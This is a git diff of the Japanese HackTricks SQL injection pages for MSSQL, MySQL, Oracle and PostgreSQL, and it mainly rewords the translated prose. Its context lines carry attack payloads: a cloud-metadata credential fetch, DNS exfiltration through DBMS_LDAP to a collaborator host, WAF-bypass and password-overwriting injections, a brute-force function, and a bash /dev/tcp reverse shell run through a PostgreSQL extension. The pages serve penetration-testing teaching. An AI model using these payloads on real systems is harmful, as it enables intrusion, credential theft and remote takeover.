+### MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
 
-CLR UDF (共通言語ランタイムユーザー定義関数) を作成することは、任意の .NET 言語で作成され、DLL にコンパイルされ、MSSQL 内でカスタム関数を実行するためにロードされるコードを必要とするプロセスであり、`dbo` アクセスが必要です。これは通常、データベース接続が `sa` または管理者ロールで行われる場合にのみ実行可能です。
+CLR UDF（共通言語ランタイムユーザー定義関数）を作成することは、任意の.NET言語で作成され、DLLにコンパイルされたコードをMSSQL内でカスタム関数を実行するためにロードするプロセスであり、`dbo`アクセスが必要です。これは通常、データベース接続が`sa`または管理者ロールで行われる場合にのみ実行可能です。
 
-バイナリを CLR アセンブリとして MSSQL にロードするための Visual Studio プロジェクトとインストール手順は、[この Github repository](https://github.com/infiniteloopltd/SQLHttp) に提供されており、これにより MSSQL 内から HTTP GET リクエストを実行できるようになります。
+バイナリをCLRアセンブリとしてMSSQLにロードするためのVisual Studioプロジェクトとインストール手順は、[このGithubリポジトリ](https://github.com/infiniteloopltd/SQLHttp)に提供されており、これによりMSSQL内からHTTP GETリクエストを実行できるようになります。
 
-この機能の核心は、`http.cs` ファイルにカプセル化されており、`WebClient` クラスを使用して GET リクエストを実行し、以下のようにコンテンツを取得します：
+この機能の核心は、`http.cs`ファイルにカプセル化されており、`WebClient`クラスを使用してGETリクエストを実行し、以下のようにコンテンツを取得します：
 ```csharp
 using System.Data.SqlTypes;
 using System.Net;
@@ -137,11 +137,11 @@ DECLARE @url varchar(max);
 SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
 SELECT dbo.http(@url);
 ```
-### **クイックエクスプロイテーション: 単一クエリでテーブル全体の内容を取得する**
+### **クイックエクスプロイト: 単一クエリでテーブル全体の内容を取得する**
 
 [Trick from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/).
 
-単一クエリでテーブルの全内容を抽出する簡潔な方法は、`FOR JSON`句を利用することです。このアプローチは、特定のモード「raw」を必要とする`FOR XML`句を使用するよりも簡潔です。`FOR JSON`句はその簡潔さから好まれます。
+単一クエリでテーブルの全内容を抽出する簡潔な方法は、`FOR JSON`句を利用することです。このアプローチは、特定のモード「raw」を必要とする`FOR XML`句を使用するよりも簡潔です。`FOR JSON`句は、その簡潔さから好まれます。
 
 現在のデータベースからスキーマ、テーブル、およびカラムを取得する方法は次のとおりです:
 ````sql
@@ -231,7 +231,7 @@ admina'union select 1,'admin','testtest123'exec('select 1')--
 SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123'
 exec('select 1')--'
 
-# 奇妙に構築されたクエリを使用する
+# 奇妙に構築されたクエリの使用
 admin'exec('update[users]set[password]=''a''')--
 ## これは次のようになります:
 SELECT id, username, password FROM users WHERE username = 'admin'
diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md
index 266f67faf..804eb637c 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/README.md
@@ -50,7 +50,7 @@ SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCH
 ```
 ## フロー
 
-「現代」の**MySQL**のバージョンでは、"_**information_schema.tables**_"を"_**mysql.innodb_table_stats**_**"**に置き換えることができることを忘れないでください（これはWAFを回避するのに役立つかもしれません）。
+「現代」の**MySQL**のバージョンでは、"_**information_schema.tables**_"を"_**mysql.innodb_table_stats**_**"**に置き換えることができることを覚えておいてください（これはWAFを回避するのに役立つかもしれません）。
 ```sql
 SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
 SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
@@ -62,12 +62,12 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 - `group_concat()`
 - `Limit X,1`
 
-### **盲目的に1つずつ**
+### **ブラインド1つずつ**
 
 - `substr(version(),X,1)='r'` または `substring(version(),X,1)=0x70` または `ascii(substr(version(),X,1))=112`
 - `mid(version(),X,1)='5'`
 
-### **盲目的に追加**
+### **ブラインド追加**
 
 - `LPAD(version(),1...lenght(version()),'1')='asd'...`
 - `RPAD(version(),1...lenght(version()),'1')='asd'...`
@@ -105,7 +105,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 
 ### 準備されたステートメントを通じてクエリを実行する
 
-スタッククエリが許可されている場合、実行したいクエリの16進数表現を変数に割り当て（SETを使用）、その後PREPAREおよびEXECUTE MySQLステートメントを使用して最終的にクエリを実行することでWAFをバイパスできる可能性があります。こんな感じです：
+スタッククエリが許可されている場合、実行したいクエリの16進数表現を変数に割り当て（SETを使用）、その後PREPAREおよびEXECUTE MySQLステートメントを使用して最終的にクエリを実行することでWAFをバイパスできる可能性があります。次のようなものです：
 ```
 0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
 ```
@@ -113,7 +113,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 
 ### Information_schemaの代替
 
-**MySQL**の「現代的な」バージョンでは、_**information_schema.tables**_を_**mysql.innodb_table_stats**_や_**sys.x$schema_flattened_keys**_、または**sys.schema_table_statistics**に置き換えることができることを覚えておいてください。
+「現代」の**MySQL**のバージョンでは、_**information_schema.tables**_を_**mysql.innodb_table_stats**_や_**sys.x$schema_flattened_keys**_、または**sys.schema_table_statistics**に置き換えることができることを覚えておいてください。
 
 ### MySQLインジェクション（カンマなし）
 
@@ -123,13 +123,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 ### 列名なしで値を取得する
 
-もしある時点でテーブルの名前はわかっているが、テーブル内の列の名前がわからない場合、次のようなコマンドを実行して、列の数を調べることができます:
+もし、テーブルの名前はわかっているが、そのテーブル内の列の名前がわからない場合は、次のようなコマンドを実行して、列の数を調べることができます:
 ```bash
 # When a True is returned, you have found the number of columns
 select (select "", "") = (SELECT * from demo limit 1);     # 2columns
 select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
 ```
-2つの列があると仮定します（最初の列がIDで、もう1つの列がフラグです）。フラグの内容を文字ごとにブルートフォースで試すことができます：
+フラグの内容を文字ごとに試してブルートフォースすることができます。最初の列がIDで、もう一つの列がフラグであると仮定します。
 ```bash
 # When True, you found the correct char and can start ruteforcing the next position
 select (select 1, 'flaf') = (SELECT * from demo limit 1);
@@ -138,7 +138,7 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1);
 
 ### MySQLの歴史
 
-**sys.x$statement_analysis**テーブルを読み取ることで、MySQL内の他の実行を確認できます。
+**sys.x$statement_analysis**テーブルを読み取ることで、他の実行を確認できます。
 
 ### バージョンの代替**s**
 ```
diff --git a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
index 956817a61..bf2a79e77 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -8,9 +8,9 @@
 
 SQLのアウトオブバンドデータ流出の探求において、`LOAD_FILE()`関数はネットワークリクエストを開始するために一般的に使用されます。しかし、この関数は、動作するオペレーティングシステムとデータベースの起動設定によって制約されます。
 
-`secure_file_priv`グローバル変数が未設定の場合、デフォルトで`/var/lib/mysql-files/`に設定され、このディレクトリへのファイルアクセスが制限されます。空の文字列（`""`）に設定することで、この制限を解除する必要があります。この調整には、データベースの設定ファイルや起動パラメータの変更が必要です。
+`secure_file_priv`グローバル変数が未設定の場合、デフォルトで`/var/lib/mysql-files/`に設定され、このディレクトリへのファイルアクセスが制限されます。空の文字列（`""`）に設定することで、この制限を解除する必要があります。この調整には、データベースの設定ファイルまたは起動パラメータの変更が必要です。
 
-`secure_file_priv`が無効（`""`）であり、必要なファイルと`file_priv`の権限が付与されていると仮定すると、指定されたディレクトリの外にあるファイルを読み取ることができます。しかし、これらの関数がネットワーク呼び出しを行う能力は、オペレーティングシステムに大きく依存します。Windowsシステムでは、UNCパスへのネットワーク呼び出しが可能であり、オペレーティングシステムがUNC命名規則を理解しているため、NTLMv2ハッシュの流出につながる可能性があります。
+`secure_file_priv`が無効（`""`）であり、必要なファイルと`file_priv`の権限が付与されていると仮定すると、指定されたディレクトリ外のファイルを読み取ることができます。しかし、これらの関数がネットワーク呼び出しを行う能力は、オペレーティングシステムに大きく依存します。Windowsシステムでは、UNCパスへのネットワーク呼び出しが可能であり、オペレーティングシステムがUNC命名規則を理解しているため、NTLMv2ハッシュの流出につながる可能性があります。
 
 このSSRF手法はTCPポート445に制限されており、ポート番号の変更は許可されていませんが、完全な読み取り権限を持つ共有にアクセスするために使用でき、以前の研究で示されたように、さらなる悪用のためにハッシュを盗むことができます。
 
diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md
index e824d3c4c..4ee907126 100644
--- a/src/pentesting-web/sql-injection/oracle-injection.md
+++ b/src/pentesting-web/sql-injection/oracle-injection.md
@@ -6,9 +6,9 @@
 
 ## SSRF
 
-Oracleを使用してOut of Band HTTPおよびDNSリクエストを行うことはよく文書化されていますが、SQLデータを抽出する手段としての注入に関しても同様です。これらの技術/関数を常に変更して、他のSSRF/XSPAを実行することができます。
+Oracleを使用してOut of Band HTTPおよびDNSリクエストを行うことはよく文書化されていますが、これはSQLデータを抽出するための手段としての注入です。これらの技術/関数を常に変更して、他のSSRF/XSPAを行うことができます。
 
-Oracleのインストールは非常に面倒な場合があります。特に、コマンドを試すために迅速なインスタンスをセットアップしたい場合はなおさらです。私の友人であり、[Appsecco](https://appsecco.com)の同僚である[Abhisek Datta](https://github.com/abhisek)が、私に[https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c)を教えてくれました。これにより、t2.largeのAWS UbuntuマシンとDocker上にインスタンスをセットアップすることができました。
+Oracleのインストールは非常に面倒な場合があります。特に、コマンドを試すために迅速なインスタンスをセットアップしたい場合はなおさらです。私の友人であり、[Appsecco](https://appsecco.com)の同僚である[Abhisek Datta](https://github.com/abhisek)は、私に[https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c)を教えてくれました。これにより、t2.largeのAWS UbuntuマシンとDocker上にインスタンスをセットアップすることができました。
 
 私は、ブログ投稿の期間中にOracleをネイティブインストールとして完全なネットワークアクセスで模倣できるように、`--network="host"`フラグを使用してdockerコマンドを実行しました。
 ```
@@ -39,17 +39,17 @@ site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portn
 
 この粗い検索は明らかに `DBMS_LDAP` のようなパッケージをスキップしています（ホスト名とポート番号を渡すことを許可します）[ドキュメントページ](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)は単に[別の場所](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)を指しています。したがって、私が見逃したかもしれないアウトバウンドリクエストを行うために悪用できる他のOracleパッケージがあるかもしれません。
 
-いずれにせよ、上記で発見しリストしたいくつかのパッケージを見てみましょう。
+いずれにせよ、私たちが発見し、上にリストしたパッケージのいくつかを見てみましょう。
 
 **DBMS_LDAP.INIT**
 
-`DBMS_LDAP` パッケージはLDAPサーバーからデータにアクセスすることを可能にします。 `init()` 関数はLDAPサーバーとのセッションを初期化し、ホスト名とポート番号を引数として受け取ります。
+`DBMS_LDAP` パッケージはLDAPサーバーからデータにアクセスすることを許可します。 `init()` 関数はLDAPサーバーとのセッションを初期化し、ホスト名とポート番号を引数として取ります。
 
 この関数は以前にDNSを介してデータの抽出を示すために文書化されています。以下のように
 ```
 SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
 ```
-しかし、この関数はホスト名とポート番号を引数として受け入れるため、これを使用してポートスキャナーのように動作させることもできます。
+しかし、この関数はホスト名とポート番号を引数として受け取るため、これを使用してポートスキャナーのように動作させることもできます。
 
 いくつかの例を示します。
 ```
@@ -84,7 +84,7 @@ END;
 
 `UTL_TCP` パッケージとその手続きおよび関数は、[サービスとのTCP/IPベースの通信を可能にします](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190)。特定のサービス用にプログラムされている場合、このパッケージはネットワークへの侵入や、TCP/IP接続のすべての側面を制御できるため、完全なサーバーサイドリクエストを実行する手段となることがあります。
 
-Oracleのドキュメントサイトの[例では、このパッケージを使用して生のTCP接続を作成し、ウェブページを取得する方法が示されています](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190)。これをもう少し簡略化して、メタデータインスタンスや任意のTCP/IPサービスにリクエストを送信するために使用することができます。
+Oracleのドキュメントサイトの[例では、このパッケージを使用して生のTCP接続を作成し、ウェブページを取得する方法が示されています](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190)。これをもう少し簡略化して、メタデータインスタンスや任意のTCP/IPサービスにリクエストを送信するために使用できます。
 ```
 set serveroutput on size 30000;
 SET SERVEROUTPUT ON
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md
index 27bdea407..f76e6c402 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -40,7 +40,7 @@ id=1; select pg_sleep(10);-- -
 
 **query_to_xml**
 
-この関数は、すべてのデータをXML形式で1つのファイルに返します。大量のデータを1行でダンプしたい場合に最適です：
+この関数は、すべてのデータをXML形式で1つのファイルに返します。大量のデータを1行でダンプしたい場合に最適です。
 ```sql
 SELECT query_to_xml('select * from pg_user',true,true,'');
 ```
@@ -52,7 +52,7 @@ SELECT database_to_xml(true,true,'');
 ```
 ### Hexの文字列
 
-**クエリ**を**文字列内**で実行できる場合（例えば、**`query_to_xml`**関数を使用する場合）、**convert_fromを使用して文字列を16進数として渡し、この方法でフィルターをバイパスできます。**
+**クエリ**を**文字列内**で実行できる場合（例えば、**`query_to_xml`**関数を使用する場合）。**この方法でフィルターをバイパスするために、文字列を16進数として渡すためにconvert_fromを使用できます:**
 ```sql
 select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
 
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index e42e568ab..e5cf2cfb4 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -2,15 +2,15 @@
 
 ### PostgreSQL 大きなオブジェクト
 
-PostgreSQL は、**大きなオブジェクト**として知られる構造を提供しており、`pg_largeobject` テーブルを介してアクセス可能で、画像や PDF ドキュメントなどの大きなデータ型を保存するために設計されています。このアプローチは、**データをファイルシステムに戻すエクスポート**を可能にするため、`COPY TO` 関数よりも有利であり、元のファイルの正確な複製が維持されます。
+PostgreSQL は、**大きなオブジェクト**として知られる構造を提供しており、`pg_largeobject` テーブルを介してアクセス可能で、画像や PDF ドキュメントなどの大きなデータ型を保存するために設計されています。このアプローチは、**データをファイルシステムに戻すことができる**ため、`COPY TO` 関数よりも有利であり、元のファイルの正確な複製が維持されます。
 
-このテーブル内に**完全なファイルを保存する**ためには、`pg_largeobject` テーブルにオブジェクトを作成し（LOID で識別される）、次にこのオブジェクトに 2KB サイズのデータチャンクを挿入する必要があります。これらのチャンクは、エクスポート機能が正しく動作するために、正確に 2KB のサイズであることが重要です（最後のチャンクは例外となる可能性があります）。
+このテーブル内に**完全なファイルを保存する**ためには、`pg_largeobject` テーブルにオブジェクトを作成し（LOID で識別される）、次にデータチャンクを挿入する必要があります。各チャンクは 2KB のサイズでなければなりません。これらのチャンクは、エクスポート機能が正しく動作するために、正確に 2KB のサイズであることが重要です（最後のチャンクは例外となる可能性があります）。
 
 **バイナリデータを** 2KB のチャンクに**分割する**ために、次のコマンドを実行できます：
 ```bash
 split -b 2048 your_file # Creates 2KB sized files
 ```
-各ファイルをBase64またはHexにエンコードするために、以下のコマンドを使用できます：
+各ファイルをBase64またはHexにエンコードするには、以下のコマンドを使用できます：
 ```bash
 base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
 xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line
@@ -23,7 +23,7 @@ select loid, pageno, encode(data, 'escape') from pg_largeobject;
 ```
 #### `lo_creat` と Base64 の使用
 
-バイナリデータを保存するために、最初に LOID が作成されます:
+バイナリデータを保存するために、まず LOID が作成されます:
 ```sql
 SELECT lo_creat(-1);       -- Creates a new, empty large object
 SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID
@@ -43,7 +43,7 @@ SELECT lo_unlink(173454);  -- Deletes the specified large object
 ```
 #### `lo_import` と Hex の使用
 
-`lo_import` 関数は、大きなオブジェクトの LOID を作成し指定するために利用できます:
+`lo_import` 関数は、大きなオブジェクトの LOID を作成し、指定するために利用できます:
 ```sql
 select lo_import('/path/to/file');
 select lo_import('/path/to/file', 173454);
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
index ada1186e3..e9be7f54c 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -1,9 +1,9 @@
-# dblink/lo_import データのエクスフィルトレーション
+# dblink/lo_import データ流出
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**これは、`lo_import`を使用してデータをデータベースにロードし、`dblink_connect`を使用してそれらをエクスフィルトレートする方法の例です。**
+**これは、`lo_import`を使用してデータをデータベースにロードし、`dblink_connect`を使用してそれらを流出させる方法の例です。**
 
-**解決策は次のリンクから確認できます:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
+**解決策は次のリンクから確認してください:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
index c57eccaad..7dbd647a7 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -1,10 +1,10 @@
-# ネットワーク - プライベシー昇格、ポートスキャナーとNTLMチャレンジレスポンス漏洩
+# ネットワーク - プライベシー昇格、ポートスキャナーとNTLMチャレンジレスポンスの漏洩
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**詳細情報は** [**元の論文でこれらの攻撃について**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt) **見つけてください。**
+**詳細情報は** [**元の論文でこれらの攻撃についてもっと知る**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)ことができます。
 
-**PostgreSQL 9.1** 以降、追加モジュールのインストールは簡単です。 [登録された拡張機能 `dblink`](https://www.postgresql.org/docs/current/contrib.html) は [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html) を使用してインストールできます：
+**PostgreSQL 9.1**以降、追加モジュールのインストールは簡単です。[`dblink`](https://www.postgresql.org/docs/current/contrib.html)のような登録された拡張機能は、[`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html)を使用してインストールできます：
 ```sql
 CREATE EXTENSION dblink;
 ```
@@ -12,11 +12,11 @@ dblinkがロードされると、いくつかの興味深いトリックを実
 
 ### 特権昇格
 
-ファイル`pg_hba.conf`が不適切に構成されていると、**パスワードを知らなくても**、**任意のユーザーとしてlocalhostからの接続を**許可する可能性があります。このファイルは通常`/etc/postgresql/12/main/pg_hba.conf`にあり、不適切な構成は次のようになります。
+ファイル `pg_hba.conf` が不適切に構成されていると、**パスワードを知らなくても** **任意のユーザーとしてlocalhostからの接続を許可する** 可能性があります。このファイルは通常 `/etc/postgresql/12/main/pg_hba.conf` にあり、不適切な構成は次のようになります。
 ```
 local    all    all    trust
 ```
-_この設定は、管理者がデータベースユーザーのパスワードを忘れたときにパスワードを変更するために一般的に使用されることに注意してください。したがって、時々それを見つけることができます。_\
+_この設定は、管理者がデータベースユーザーのパスワードを忘れたときにパスワードを変更するために一般的に使用されるため、時々見つけることがあります。_\
 &#xNAN;_また、ファイル pg_hba.conf は postgres ユーザーとグループによってのみ読み取り可能で、postgres ユーザーによってのみ書き込み可能であることに注意してください。_
 
 このケースは、**すでに**被害者の**シェル**を持っている場合に**便利**であり、postgresql データベースに接続することを可能にします。
@@ -26,7 +26,7 @@ _この設定は、管理者がデータベースユーザーのパスワード
 host    all     all     127.0.0.1/32    trust
 ```
 ローカルホストから誰でも任意のユーザーとしてデータベースに接続できるようになります。\
-この場合、**`dblink`** 関数が **動作している** 場合、既に確立された接続を通じてデータベースに接続することで **権限を昇格** させ、アクセスできないはずのデータにアクセスすることができます：
+この場合、**`dblink`** 関数が **動作している** 場合、既に確立された接続を通じてデータベースに接続し、アクセスできないはずのデータにアクセスすることで **権限を昇格** させることができます：
 ```sql
 SELECT * FROM dblink('host=127.0.0.1
 user=postgres
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
index c11556979..da0261c30 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**[元の論文でこれらの攻撃に関する詳細情報を見つける](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**。
+**[この攻撃に関する詳細情報は元の論文を参照してください](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**。
 
 PL/pgSQLは、**強化された手続き制御**を提供することにより、SQLの能力を超えた**完全なプログラミング言語**です。これには、ループやさまざまな制御構造の利用が含まれます。PL/pgSQL言語で作成された関数は、SQL文やトリガーによって呼び出すことができ、データベース環境内の操作の範囲を広げます。
 
@@ -24,13 +24,13 @@ lanname | lanacl
 ---------+-----------------
 plpgsql | {admin=U/admin}
 ```
-次のスクリプトが機能するためには、**`dblink`関数が存在する必要があります**。存在しない場合は、次のように作成を試みることができます。
+次のスクリプトが機能するためには、**`dblink`関数が存在する必要があります**。存在しない場合は、作成を試みることができます。
 ```sql
 CREATE EXTENSION dblink;
 ```
 ## パスワードブルートフォース
 
-4文字のパスワードブルートフォースを実行する方法は次のとおりです:
+ここでは、4文字のパスワードブルートフォースを実行する方法を示します:
 ```sql
 //Create the brute-force function
 CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 382319a27..48081cd28 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -28,7 +28,7 @@ CREATE OR REPLACE FUNCTION close(int) RETURNS int AS '/lib/libc.so.6', 'close' L
 
 <summary>Base64からバイナリファイルを書く</summary>
 
-Postgresでファイルにバイナリを書き込むには、base64を使用する必要があるかもしれません。これはそのために役立ちます:
+Postgresでバイナリをファイルに書き込むには、base64を使用する必要があるかもしれません。これはそのために役立ちます:
 ```sql
 CREATE OR REPLACE FUNCTION write_to_file(file TEXT, s TEXT) RETURNS int AS
 $$
@@ -75,7 +75,7 @@ HINT:  Extension libraries are required to use the PG_MODULE_MAGIC macro.
 ```
 このエラーは[PostgreSQLのドキュメント](https://www.postgresql.org/docs/current/static/xfunc-c.html)で説明されています：
 
-> 動的にロードされたオブジェクトファイルが互換性のないサーバーにロードされないように、PostgreSQLはファイルが適切な内容を持つ「マジックブロック」を含んでいるかどうかをチェックします。これにより、サーバーは異なるメジャーバージョンのPostgreSQL用にコンパイルされたコードなど、明らかな互換性の問題を検出できます。マジックブロックはPostgreSQL 8.2以降が必要です。マジックブロックを含めるには、ヘッダーfmgr.hをインクルードした後、モジュールソースファイルの1つ（そして1つだけ）に次のように記述します：
+> 動的にロードされたオブジェクトファイルが互換性のないサーバーにロードされないようにするために、PostgreSQLはファイルが適切な内容を持つ「マジックブロック」を含んでいるかどうかをチェックします。これにより、サーバーは異なるメジャーバージョンのPostgreSQL用にコンパイルされたコードなど、明らかな互換性の問題を検出できます。マジックブロックはPostgreSQL 8.2以降が必要です。マジックブロックを含めるには、ヘッダーfmgr.hをインクルードした後、モジュールソースファイルの1つ（そして1つだけ）に次のように記述します：
 >
 > `#ifdef PG_MODULE_MAGIC`\
 > `PG_MODULE_MAGIC;`\
@@ -90,9 +90,9 @@ PostgreSQLバージョン8.2以降、攻撃者がシステムを悪用するプ
 SELECT version();
 PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
 ```
-互換性のために、メジャーバージョンが一致することが重要です。したがって、9.6.xシリーズ内の任意のバージョンでライブラリをコンパイルすることで、成功した統合が保証されるはずです。
+互換性のために、主要バージョンが一致することが重要です。したがって、9.6.xシリーズ内の任意のバージョンでライブラリをコンパイルすることで、成功した統合が保証されるはずです。
 
-そのバージョンをシステムにインストールするには:
+そのバージョンをシステムにインストールするには：
 ```bash
 apt install postgresql postgresql-server-dev-9.6
 ```
@@ -119,7 +119,7 @@ CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAG
 SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
 #Notice the double single quotes are needed to scape the qoutes
 ```
-この**ライブラリは事前コンパイル済み**で、いくつかの異なるPostgreSQLバージョンに対応しており、さらに**このプロセスを自動化することもできます**（PostgreSQLへのアクセスがある場合）：
+この**ライブラリは事前コンパイル済み**で、いくつかの異なるPostgreSQLバージョンに対応しており、さらに**このプロセスを自動化することもできます**（PostgreSQLアクセスがある場合）：
 
 {% embed url="https://github.com/Dionach/pgexec" %}
 
@@ -254,7 +254,7 @@ PG_RETURN_INT32(arg + 1);
 ```c
 CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
 ```
-[PolyUDFプロジェクト](https://github.com/rop-la/PolyUDF)は、完全なMS Visual Studioプロジェクトと、マルチバージョンサポートを含む使用可能なライブラリ（_command eval_、_exec_、_cleanup_を含む）を備えた良い出発点です。
+[PolyUDFプロジェクト](https://github.com/rop-la/PolyUDF)は、完全なMS Visual Studioプロジェクトと、マルチバージョンサポートを含む使用可能なライブラリ（_command eval_、_exec_、_cleanup_を含む）を提供する良い出発点です。
 
 ### 最新のPostgreSQLバージョンにおけるRCE
 
@@ -262,7 +262,7 @@ CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\sha
 
 これらの制限にもかかわらず、認証されたデータベースの`superuser`は「大きなオブジェクト」を使用してファイルシステムに**バイナリファイル**を書き込むことが可能です。この機能は、テーブルの更新や作成などのデータベース操作に不可欠な`C:\Program Files\PostgreSQL\11\data`ディレクトリ内での書き込みにも及びます。
 
-重要な脆弱性は、`CREATE FUNCTION`コマンドから生じます。このコマンドはデータディレクトリへの**ディレクトリトラバーサル**を**許可**します。その結果、認証された攻撃者はこのトラバーサルを**悪用**してデータディレクトリに共有ライブラリファイルを書き込み、次にそれを**ロード**することができます。このエクスプロイトにより、攻撃者は任意のコードを実行し、システム上でネイティブコードの実行を達成します。
+重要な脆弱性は、`CREATE FUNCTION`コマンドから生じます。このコマンドはデータディレクトリへの**ディレクトリトラバーサル**を**許可**します。したがって、認証された攻撃者はこのトラバーサルを**悪用**してデータディレクトリに共有ライブラリファイルを書き込み、その後**ロード**することができます。このエクスプロイトにより、攻撃者は任意のコードを実行し、システム上でネイティブコードの実行を達成します。
 
 #### 攻撃フロー
 
@@ -272,16 +272,16 @@ CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\sha
 big-binary-files-upload-postgresql.md
 {{#endref}}
 
-拡張機能（この例ではpoc.dllという名前）をデータディレクトリにアップロードしたら、次のようにしてそれをロードできます：
+拡張機能（この例ではpoc.dllという名前）をデータディレクトリにアップロードしたら、次のようにしてロードできます：
 ```c
